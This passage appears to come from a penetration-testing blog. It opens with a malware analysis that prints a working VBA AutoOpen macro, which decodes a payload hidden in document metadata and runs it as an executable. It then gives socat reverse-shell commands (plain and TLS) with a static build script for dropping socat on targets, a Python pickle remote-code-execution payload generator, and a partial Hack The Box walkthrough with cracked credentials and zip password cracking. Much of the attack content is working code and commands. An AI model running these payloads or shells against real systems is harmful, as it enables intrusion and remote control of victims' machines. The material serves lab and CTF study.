 A4: m    1073 'VBA/ThisDocument'
 A5:      4400 'VBA/_VBA_PROJECT'
 A6:       734 'VBA/dir'

The object to extract is A3, since it is marked with the letter M, which the oledump tool uses to denote macro code. Its content is shown below

Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long

Sub AutoOpen()
    On Error Resume Next
    Dim found_value As String

    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            found_value = Mid(prop.Value, 56)
            orig_val = Base64Decode(found_value)
            #If Mac Then
                ExecuteForOSX (orig_val)
            #Else
                ExecuteForWindows (orig_val)
            #End If
            Exit For
        End If
    Next
End Sub

Sub ExecuteForWindows(code)
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    tmp_folder = fso.GetSpecialFolder(2)
    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
    Set f = fso.createTextFile(tmp_name)
    f.Write (code)
    f.Close
    CreateObject("WScript.Shell").Run (tmp_name)
End Sub

Sub ExecuteForOSX(code)
    System ("echo """ & code & """ | python &")
End Sub


' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    nGroup = Hex(nGroup)
    
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  Base64Decode = sOut
End Function

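The source code in this instance is not obfuscated, which makes it easier to analyze, and there is a check for the OS that is running so that different commands are used. The macro reads the Comments property from the metadata, skips its first 55 characters, Base64 decodes the remainder, and on Windows writes the result to a temporary .exe file that it then runs.

Checking the core.xml file shows a big block of data in the description field

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:title/>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords/>
  <dc:description>TVqQAAMAAA[...]GFiLnBkYgA=</dc:description>
  <cp:lastModifiedBy>Wei Chen</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-25T19:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-25T19:28:00Z</dcterms:modified>
</cp:coreProperties>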

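The long string is encoded using Base64. Its leading characters, TVqQ, decode to the bytes MZ followed by 0x90, which is the start of a Windows PE file, and decoding the data results in a binary file.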
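A quick way to confirm what kind of data a Base64 string holds is to decode only its first few characters and compare them against known file signatures. The Python sketch below checks for the MZ signature used by Windows executables; the function name is illustrative.

```python
import base64


def decodes_to_pe(encoded: str) -> bool:
    """Return True if Base64 text starts with the MZ executable signature."""
    try:
        # Four Base64 characters decode to the first three bytes
        head = base64.b64decode(encoded[:4], validate=True)
    except ValueError:
        return False
    return head[:2] == b"MZ"


# Start of the description field shown above
print(decodes_to_pe("TVqQAAMAAA"))
```

The full payload can then be decoded with base64.b64decode and written to a file for analysis in an isolated environment.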

Checking the Windows executable with Radare2 shows the following

❯ r2 msf.dat
[0x00407354]> i
fd       3
file     msf.dat
size     0x1204a
humansz  72.1K
mode     r-x
format   pe
iorw     false
blksz    0x0
block    0x100
type     EXEC (Executable file)
arch     x86
baddr    0x400000
binsz    73802
bintype  pe
bits     32
canary   false
retguard false
class    PE32
cmp.csum 0x000125dd
compiled Tue Apr 14 04:46:43 2009
crypto   false
dbg_file C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb
endian   little
havecode true
hdr.csum 0x00000000
guid     4AC180361
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  i386
maxopsz  16
minopsz  1
nx       false
os       windows
overlay  true
cc       cdecl
pcalign  0
pic      false
relocs   true
signed   false
sanitiz  false
static   false
stripped false
subsys   Windows GUI
va       true

The binary analysis of this file is out of the scope of this documentation; however, it establishes a reverse shell back to the attacker.

SOCAT

Fri, 08 Oct 2021 22:56:24 +0000

There are several commands and tools that can be used to establish a shell connection between hosts; one that is very useful in multiple ways is socat. There are several benefits to using socat over netcat, one being the ability to stabilize the shell from the start without having to run through a sequence of commands to do so. The only downside to this tool is that it requires the binary to exist on both ends, which might not be the case on many targets, but it can be easy to move the binary to the target system and start a better reverse shell.

This post covers establishing a shell session between two hosts in Windows and Linux environments; these are the commands I use when working on a Hack The Box machine when I want to use socat. It also covers compiling the binaries for Linux and Windows.

The same code is used for the binaries in either environment. The advantage of this is being able to use the same commands regardless of the environment and not having to remember the differences between one and the other, besides the program being used as the shell.

Reverse Shell Session

A listener can be started with the following command, which has the advantage of creating a stable shell without needing to run additional commands

socat file:`tty`,raw,echo=0 tcp4-listen:9000

If the listener is started in a Windows environment, use the following command instead, though it is not as stable as the command above

socat tcp4-listen:9000 stdout

On the target host, the reverse shell is started with the command below

socat exec:'/usr/bin/bash -li',pty,stderr,setsid,sigint,sane tcp4:0.0.0.0:9000

Replace the IP address 0.0.0.0 with the address of the listening host, so that the target host establishes the connection to the attacker's host.

Despite the shell being more stable from the start, it may be necessary to set the terminal dimensions with stty and the TERM environment variable to further stabilize the shell and prevent artifacts from showing up in the output. If the target system is running Linux, simply set the TERM environment variable to the terminal being used; since I use xterm, I run the command export TERM=xterm-256color.

Setting the terminal dimensions is done by first running the command stty size on the local system, which prints the rows followed by the columns, and then applying those values on the reverse shell with a command such as stty rows 80 cols 124, replacing the values as necessary.

The command below can be executed on the local system to generate the necessary commands; its output only needs to be copied from the local terminal and pasted into the reverse shell session

stty size | awk '{printf "stty rows " $1 " cols " $2}';printf ";export TERM=$TERM"

The steps above only apply when both hosts run a Unix-based system, not when either one runs Windows.
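
The same one-liner can also be produced from Python. This is a minimal sketch under a few assumptions: stty_fixup is a hypothetical helper name, and the fallback value for TERM is only the one mentioned earlier in this post.

```python
import os
import shutil


def stty_fixup(rows: int, cols: int, term: str) -> str:
    """Return the commands to paste into the reverse shell session."""
    return f"stty rows {rows} cols {cols};export TERM={term}"


# get_terminal_size() falls back to 80x24 when no terminal is attached.
size = shutil.get_terminal_size()
print(stty_fixup(size.lines, size.columns, os.environ.get("TERM", "xterm-256color")))
```

The printed line has the same shape as the output of the stty and awk pipeline above, so it can be pasted into the reverse shell in the same way.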

TLS Encryption

An encrypted connection can also be started with the use of an SSL certificate; the commands below create the certificate

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 30 -nodes
cat key.pem cert.pem > single.pem

Start the listener with the command below

socat file:`tty`,raw,echo=0 openssl-listen:9000,cert=single.pem,verify=0

On the target host, the following command can be used to initiate the reverse shell

socat exec:'/usr/bin/bash -li',pty,stderr,setsid,sigint,sane openssl:0.0.0.0:9000,verify=0
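
Since the plain and TLS variants only differ in the address part, the command pairs can be generated instead of edited by hand. The sketch below is illustrative: socat_commands is a hypothetical helper, and it only reuses the socat options already shown in this post.

```python
def socat_commands(host: str, port: int = 9000, tls: bool = False,
                   shell: str = "/usr/bin/bash -li") -> dict:
    """Build the listener and target command lines for one session."""
    if tls:
        listen = f"openssl-listen:{port},cert=single.pem,verify=0"
        connect = f"openssl:{host}:{port},verify=0"
    else:
        listen = f"tcp4-listen:{port}"
        connect = f"tcp4:{host}:{port}"
    return {
        # The backticks are left for the local shell to expand.
        "listener": f"socat file:`tty`,raw,echo=0 {listen}",
        "target": f"socat exec:'{shell}',pty,stderr,setsid,sigint,sane {connect}",
    }


for name, command in socat_commands("10.10.14.62", tls=True).items():
    print(f"{name}: {command}")
```

The host value is the address of the listening system, which replaces the 0.0.0.0 placeholder in the target command.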

Compile Socat

The socat binary can be statically compiled so that it can be uploaded to a target Linux host and used to establish a reverse shell. Compilation is done within a container to prevent having to install any additional tools.

The following build.sh script is used for the compilation; check for the latest versions of each of the packages needed for the compilation process

#!/bin/bash

set -e
set -o pipefail
set -x

# Check for the latest versions of these packages
SOCAT_VERSION=1.7.4.1
NCURSES_VERSION=6.2
READLINE_VERSION=8.1
OPENSSL_VERSION=1.1.1k

function build_ncurses() {
    cd /build

    # Download
    curl -LO http://invisible-mirror.net/archives/ncurses/ncurses-${NCURSES_VERSION}.tar.gz
    tar zxvf ncurses-${NCURSES_VERSION}.tar.gz
    cd ncurses-${NCURSES_VERSION}

    # Build
    CC='/usr/bin/gcc -static' CFLAGS='-fPIC' ./configure \
        --disable-shared \
        --enable-static
}

function build_readline() {
    cd /build

    # Download
    curl -LO ftp://ftp.cwru.edu/pub/bash/readline-${READLINE_VERSION}.tar.gz
    tar xzvf readline-${READLINE_VERSION}.tar.gz
    cd readline-${READLINE_VERSION}

    # Build
    CC='/usr/bin/gcc -static' CFLAGS='-fPIC' ./configure \
        --disable-shared \
        --enable-static
    make -j4

    # Note that socat looks for readline in <readline/readline.h>, so we need
    # that directory to exist.
    ln -s /build/readline-${READLINE_VERSION} /build/readline
}

function build_openssl() {
    cd /build

    # Download
    curl -LO https://www.openssl.org/source/openssl-${OPENSSL_VERSION}.tar.gz
    tar zxvf openssl-${OPENSSL_VERSION}.tar.gz
    cd openssl-${OPENSSL_VERSION}

    # Configure
    CC='/usr/bin/gcc -static' ./Configure no-shared no-async linux-x86_64

    # Build
    make -j4
    echo "** Finished building OpenSSL"
}

function build_socat() {
    cd /build

    # Download
    curl -LO http://www.dest-unreach.org/socat/download/socat-${SOCAT_VERSION}.tar.gz
    tar xzvf socat-${SOCAT_VERSION}.tar.gz
    cd socat-${SOCAT_VERSION}

    # Build
    # NOTE: `NETDB_INTERNAL` is non-POSIX, and thus not defined by MUSL.
    # We define it this way manually.
    CC='/usr/bin/gcc -static' \
        CFLAGS='-fPIC' \
        CPPFLAGS="-I/build -I/build/openssl-${OPENSSL_VERSION}/include -DNETDB_INTERNAL=-1" \
        LDFLAGS="-L/build/readline-${READLINE_VERSION} -L/build/ncurses-${NCURSES_VERSION}/lib -L/build/openssl-${OPENSSL_VERSION}" \
        ./configure
    make -j4
    strip socat
}

function doit() {
    build_ncurses
    build_readline
    build_openssl
    build_socat

    # Copy to output
    if [ -d /output ]
    then
        OUT_DIR=/output/`uname | tr 'A-Z' 'a-z'`/`uname -m`
        mkdir -p $OUT_DIR
        cp /build/socat-${SOCAT_VERSION}/socat $OUT_DIR/
        echo "** Finished **"
    else
        echo "** /output does not exist **"
    fi
}

doit

The following Dockerfile is used to create the container that will be used for compilation

FROM docker.io/alpine:latest
MAINTAINER Andrew Dunham 

RUN apk --update add build-base bash automake git curl linux-headers

RUN mkdir /build
RUN mkdir /output
ADD . /build

# This builds the program and copies it to /output
CMD /build/build.sh

Build the container image with the command below; the files mentioned above should exist within the same directory

podman build -t socat-static .

Run the following command to start the container and compile the socat binary

podman run -v $PWD:/output --rm localhost/socat-static

The successful compilation will result in the path ./linux/x86_64/socat being created and containing the statically linked binary for 64-bit Linux systems.

To compile for 32-bit, modify the build_openssl function in build.sh so that the configure line reads CC='/usr/bin/gcc -static' ./Configure no-shared no-async linux-x86, which builds the OpenSSL library as 32-bit. Build the container image with the command podman build -t socat-static-32 --arch=386 . so that it uses the 32-bit architecture, then start it with the command podman run -v $PWD:/output --rm localhost/socat-static-32. The output is still saved to the directory ./linux/x86_64, so it overwrites any existing file named socat.

The 32-bit version will also work in the 64-bit system.

Compile for Windows

To compile in Windows, follow the steps below

Install Cygwin with the Development packages.
Download the tarball from the URL http://www.dest-unreach.org/socat/download/socat-1.7.4.1.tar.gz and untar within Cygwin.
Run the command ./configure and then make

The following libraries need to be copied along with the executable to run Socat on any Windows system; simply place them in the same folder as the executable

cyggcc_s-1.dll
cygcrypto-1.1.dll
cygncursesw-10.dll
cygreadline7.dll
cygssl-1.1.dll
cygwin1.dll
cygz.dll

The libraries are found within the Cygwin bin folder.

Python Pickles

Thu, 30 Sep 2021 17:50:39 +0000

In Python, an object can be converted into a stream of bytes so that it can be moved between environments or processes; the conversion and its reverse are known as serialization and deserialization. The Pickle library can be used in Python for this purpose; however, it is an insecure method that can allow an attacker to obtain remote code execution (RCE) on the target host.

The documentation includes a warning about this situation, stating that serialized data should only be processed when it comes from trusted sources

Warning: The pickle module is not secure. Only unpickle data you trust. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling.

There is a difference between how the object is serialized in Python 2 and Python 3, which can present an issue when dealing with applications that use the deprecated Python 2 version. However, the Pickle library in Python 3 is capable of generating a Python 2 compatible serialized object that can be used to generate the payload for these scenarios.

The following Python 3 script creates a serialized object

#!/usr/bin/env python3

import os
import pickle

class RCE(object):
    def __init__(self,cmd):
        self.cmd = cmd
    
    def __reduce__(self):
        return (os.system, (self.cmd,))

print(pickle.dumps(RCE(b"uname -a")))

The output of the script above is shown below

\x80\x04\x95#\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94C\x08uname -a\x94\x85\x94R\x94.
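
Serialized data like this can be inspected without being executed, since pickletools only parses the opcode stream. The sketch below is a hedged illustration: Demo is a stand-in for the RCE class with a harmless callable, and opcode_names is a hypothetical helper.

```python
import pickle
import pickletools


class Demo:
    """Stand-in for the RCE class; print replaces os.system on purpose."""

    def __reduce__(self):
        return (print, ("uname -a",))


def opcode_names(data: bytes) -> list:
    """List the opcodes in a pickle without running any of them."""
    return [opcode.name for opcode, _arg, _pos in pickletools.genops(data)]


payload = pickle.dumps(Demo(), protocol=4)
print(opcode_names(payload))
```

A REDUCE opcode preceded by STACK_GLOBAL (or GLOBAL in older protocols) means a callable is looked up and invoked during unpickling, which is the behavior the payload above relies on.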

The latest version of the protocol is 5; however, in Python 3.8 the default protocol version is 4. The default can be checked with pickle.DEFAULT_PROTOCOL and the highest available version with pickle.HIGHEST_PROTOCOL. The output shown above is for protocol version 4, and it would be the same with version 5 apart from the version byte in the header.

Below is the output of each protocol version for the same object mentioned in the script above

0: cposix\nsystem\np0\n(c_codecs\nencode\np1\n(Vuname -a\np2\nVlatin1\np3\ntp4\nRp5\ntp6\nRp7\n.
1: cposix\nsystem\nq\x00(c_codecs\nencode\nq\x01(X\x08\x00\x00\x00uname -aq\x02X\x06\x00\x00\x00latin1q\x03tq\x04Rq\x05tq\x06Rq\x07.
2: \x80\x02cposix\nsystem\nq\x00c_codecs\nencode\nq\x01X\x08\x00\x00\x00uname -aq\x02X\x06\x00\x00\x00latin1q\x03\x86q\x04Rq\x05\x85q\x06Rq\x07.
3: \x80\x03cposix\nsystem\nq\x00C\x08uname -aq\x01\x85q\x02Rq\x03.
4: \x80\x04\x95#\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94C\x08uname -a\x94\x85\x94R\x94.
5: \x80\x05\x95#\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94C\x08uname -a\x94\x85\x94R\x94.

The protocol versions 0 through 2 can be deserialized by Python 2, while the versions 3 through 5 can only be deserialized by Python 3. This aspect is important, since if the target application uses an older version of Python, then it is necessary to adjust the script to generate the respective payload.

Specifying which protocol version to use can be done by adding the number after the object in the dumps function or by using the protocol= argument, as shown below

pickle.dumps(RCE(b"uname -a"), 1)
pickle.dumps(RCE(b"uname -a"), protocol=1)

The other argument that changes the serialized object is fix_imports=. When the protocol version is lower than 3, it translates the module names in the serialized object so that they match the module names used in Python 2. However, the translated name may not match the module available on the target system, in which case the argument needs to be set to False. In the sample output above this made no difference, as the module name is the same in both versions; in the sample below, the output does vary because the module is named differently

Fixed import: ccommands\nPopen\np0\n(Vuname -a\np1\ntp2\nRp3\n.
Not fixed import: csubprocess\nPopen\np0\n(Vuname -a\np1\ntp2\nRp3\n.

The only difference is that the module name subprocess is changed to commands. If the protocol version is set to 3 or higher, the fix_imports= argument has no effect on the output.
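
The effect of fix_imports can be reproduced without building a payload, because pickling a class by reference writes only its module and name. This is a small sketch and not the script used for the output above.

```python
import pickle
import subprocess

# A class is pickled by reference, so only its module and name are written.
fixed = pickle.dumps(subprocess.Popen, protocol=0, fix_imports=True)
not_fixed = pickle.dumps(subprocess.Popen, protocol=0, fix_imports=False)
print("Fixed import:", fixed)
print("Not fixed import:", not_fixed)

# From protocol 3 onwards the argument is ignored.
same = (pickle.dumps(subprocess.Popen, protocol=3, fix_imports=True)
        == pickle.dumps(subprocess.Popen, protocol=3, fix_imports=False))
print("Protocol 3 identical:", same)
```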

The loads function determines the protocol version before deserializing the data it is given. When attempting to exploit a vulnerable application, this means that if a payload fails, start lowering the protocol version and include the fix_imports argument as part of the testing as well.
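
The protocol version is visible in the data itself: from protocol 2 onwards the stream starts with the byte 0x80 followed by the version number. The sketch below reads that header and enumerates the variants to try; declared_protocol and candidates are hypothetical helper names.

```python
import pickle
from typing import Iterator, Optional, Tuple


def declared_protocol(data: bytes) -> Optional[int]:
    """Return the version from the PROTO header, or None for protocols 0 and 1."""
    if len(data) >= 2 and data[0] == 0x80:
        return data[1]
    return None


def candidates(obj) -> Iterator[Tuple[int, bool, bytes]]:
    """Yield payload variants from the highest protocol down to 0."""
    for protocol in range(pickle.HIGHEST_PROTOCOL, -1, -1):
        for fix in (True, False):
            yield protocol, fix, pickle.dumps(obj, protocol=protocol, fix_imports=fix)


for protocol, fix, data in candidates(["example"]):
    print(protocol, fix, declared_protocol(data))
```

Protocols 0 and 1 carry no header, which is why the function returns None for them.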

Frolic

Thu, 30 Sep 2021 14:32:36 +0000

This is another Hack The Box machine, with a web application whose vulnerability allows for remote code execution (RCE). Privilege escalation is achieved through a stack buffer overflow, using the return-oriented programming (ROP) technique.

For the reverse engineering part of the machine, Radare2 is used to analyze the binary and locate all of the necessary aspects.

Credentials

These are credentials found in different parts of the host

admin : imnothuman
admin : superduperlooperpassword_lol
admin : idkwhatispass

Port Scan

There are 5 open ports that were found:

22/tcp OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
139/tcp Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp Node.js (Express middleware)
9999/tcp nginx 1.10.3 (Ubuntu)

The Samba service is not exposing any shares that can provide more information, so the next step is to check the website found on port 9999/tcp.

Website

Accessing the website on port 9999/tcp shows the default nginx installation page, which references the domain frolic.htb and the port 1880/tcp. However, that port only shows a Node-RED login, for which there are no credentials yet.

Running a ffuf scan with the command ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://frolic.htb:9999/FUZZ -o scans/ffuf.9999.json -c -ic -v -r -replay-proxy http://127.0.0.1:8080 shows the following relevant results

http://frolic.htb:9999/admin
http://frolic.htb:9999/backup
http://frolic.htb:9999/dev
http://frolic.htb:9999/test
http://frolic.htb:9999/loop

Upon further investigation on those URLs, the only relevant ones are

http://frolic.htb:9999/admin
http://frolic.htb:9999/backup

The backup directory points to two plain text files that contain credentials.

The admin page shows a login form and the JavaScript found at the URL http://frolic.htb:9999/admin/js/login.js contains the credentials in clear text

var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
if ( username == "admin" && password == "superduperlooperpassword_lol"){
alert ("Login successfully");
window.location = "success.html"; // Redirecting to other page.
return false;
}
else{
attempt --;// Decrementing by one.
alert("You have left "+attempt+" attempt;");
// Disabling fields after 3 attempts.
if( attempt == 0){
document.getElementById("username").disabled = true;
document.getElementById("password").disabled = true;
document.getElementById("submit").disabled = true;
return false;
}
}
}

It also points to the page http://frolic.htb:9999/admin/success.html, which contains the following Ook! code in its short form; Ook! is a rewrite of brainfuck.

..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... .....
..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... .....
....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! .....
..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?.
?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... .....
..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!!
!.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?!
.?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?..
!.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?.
?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.?
!!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!!
!.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!!
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. .....
..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!!
!!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!!
!!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! .....
..!.! !!!!! !.?.

After decoding, the message Nothing here check /asdiSIAJJ0QWE9JAS is obtained; the last part is another page within the website.
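
The decoding can be sketched in Python by translating each pair of symbols into its brainfuck instruction. This assumes the usual short-form Ook! mapping, where the word Ook is dropped and only the punctuation is kept; ook_to_bf is a hypothetical helper name.

```python
# Each pair of punctuation marks maps to one brainfuck instruction.
OOK_TO_BF = {
    ".?": ">", "?.": "<", "..": "+", "!!": "-",
    "!.": ".", ".!": ",", "!?": "[", "?!": "]",
}


def ook_to_bf(text: str) -> str:
    """Translate short-form Ook! into brainfuck, ignoring whitespace."""
    symbols = [char for char in text if char in ".?!"]
    if len(symbols) % 2:
        raise ValueError("odd number of Ook! symbols")
    pairs = zip(symbols[::2], symbols[1::2])
    return "".join(OOK_TO_BF[first + second] for first, second in pairs)


# First line of the page content shown above.
FIRST_LINE = "..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ....."
print(ook_to_bf(FIRST_LINE))
```

The resulting brainfuck program can then be run with any brainfuck interpreter to print the message.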

The page that is found in the URL http://frolic.htb:9999/asdiSIAJJ0QWE9JAS/ contains a Base64 encoded string

UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA

The encoded string is downloaded and decoded with the command curl http://frolic.htb:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd, which shows that it is binary data; the leading bytes 50 4b 03 04 (PK) are the signature of a zip archive

504b0304140009000800c389374d23fe5b14b00000006902000009001c00
696e6465782e7068705554090003857ca75b857ca75b75780b0001040000
000004000000005e44e6104a9f73b2688a299a1b9550f06e0ba9bf5373e4
024a771a11dc8ee5a034e2f6d98f6bee7ad0128a55c896ec2b58ba7fe050
c8e112e1b687a4ead0bbe2785f13c04e895bfd8d8453aaea38f283f2e20f
914a3253c72a830344d08d7d933864540e51026bde10cad7e3e4fb6a5f9f
8bf918e994c027787f6390c216dd8f74beb2373551ac0b9a8a030e95106b
032c34b5d96229be3446b5e90609ffba84e396eae9efc72671326f8857d4
9ce339504b070823fe5b14b000000069020000504b01021e031400090008
00c389374d23fe5b14b000000069020000090018000000000001000000a4
8100000000696e6465782e7068705554050003857ca75b75780b00010400
0000000400000000504b050600000000010001004f000000030100000000
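
The file type can also be confirmed from Python, which reads the archive listing without needing the password. This is a minimal sketch using the Base64 string from the page; describe_zip is a hypothetical helper name.

```python
import base64
import io
import zipfile

# Base64 string copied from the page shown above.
ENCODED = """
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA
"""

data = base64.b64decode(ENCODED)


def describe_zip(raw: bytes) -> list:
    """Return (name, uncompressed size, encrypted) for each archive member."""
    with zipfile.ZipFile(io.BytesIO(raw)) as archive:
        # Bit 0 of the general purpose flags marks an encrypted member.
        return [(info.filename, info.file_size, bool(info.flag_bits & 0x1))
                for info in archive.infolist()]


print(data[:4], describe_zip(data))
```

The encrypted flag on the single member explains why a password is needed before the content can be extracted.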

The decoded data is then stored in a zip file with the command curl http://frolic.htb:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > evidence/data/asdiSIAJJ0QWE9JAS.zip. The archive is password protected, though it appears to contain a single index.php file. The password can be cracked with John by following the steps below

Create a usable hash for cracking with John by using the command zip2john evidence/data/asdiSIAJJ0QWE9JAS.zip | tee evidence/data/asdiSIAJJ0QWE9JAS.zip.hash
Start the John container with the command podman run -v ./evidence/data:/opt/cracking -it --rm --entrypoint bash docker.io/obscuritylabs/johntheripper
Crack the hash by using the command ./john --format=PKZIP --wordlist /opt/cracking/rockyou.txt /opt/cracking/asdiSIAJJ0QWE9JAS.zip.hash

root@fb3af4a2ae0c:/opt/john/run# ./john --format=PKZIP --wordlist /opt/cracking/rockyou.txt /opt/cracking/asdiSIAJJ0QWE9JAS.zip.hash 
Warning: invalid UTF-8 seen reading /opt/cracking/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password         (asdiSIAJJ0QWE9JAS.zip/index.php)
1g 0:00:00:00 DONE (2021-06-05 16:19) 100.0g/s 354600p/s 354600c/s 354600C/s 123456..sss
Use the "--show" option to display all of the cracked passwords reliably
Session completed

The password password is used to extract the file from the zip archive

❯ 7z x asdiSIAJJ0QWE9JAS.zip

7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs x64)

Scanning the drive for archives:
1 file, 360 bytes (1 KiB)

Extracting archive: asdiSIAJJ0QWE9JAS.zip
--
Path = asdiSIAJJ0QWE9JAS.zip
Type = zip
Physical Size = 360

    
Enter password (will not be echoed):
Everything is Ok

Size:       617
Compressed: 360

The content of the index.php file is a hex string

